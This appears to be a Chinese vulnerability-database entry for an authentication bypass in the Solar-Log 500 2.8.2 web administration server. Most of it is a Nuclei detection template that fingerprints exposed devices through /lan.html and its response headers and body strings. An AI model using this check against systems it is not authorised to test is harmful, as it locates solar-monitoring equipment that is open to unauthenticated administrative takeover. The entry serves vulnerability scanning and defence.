solar-log-authbypass: Solar-Log 500 2.8.2 - Incorrect Access Control

日期: 2025-08-01 | 影响软件: Solar Log | POC: 已公开

漏洞描述

Solar-Log 500 2.8.2 is susceptible to incorrect access control because the web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server.

PoC代码[已公开]

id: solar-log-authbypass

info:
  name: Solar-Log 500 2.8.2 - Incorrect Access Control
  author: geeknik
  severity: high
  description: Solar-Log 500 2.8.2 is susceptible to incorrect access control because the web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server.
  reference:
    - https://www.exploit-db.com/exploits/49986
  classification:
    cwe-id: CWE-284
  metadata:
    max-request: 1
  tags: solarlog,auth-bypass,edb,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/lan.html"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "IPC@CHIP"

      - type: word
        part: body
        words:
          - " Solare Datensysteme GmbH"
          - "mailto:info@solar-log.com"
        condition: and
# digest: 4a0a00473045022100af9d1054a8c4806680fa5d9e457b5bb90a31909898520e37fa234f85911c960702202067de1e736f53f0340062ed03752f2a00664c7f25031e014198723e5f851853:922c64590222798bb761d5b6d8e72950

相关漏洞推荐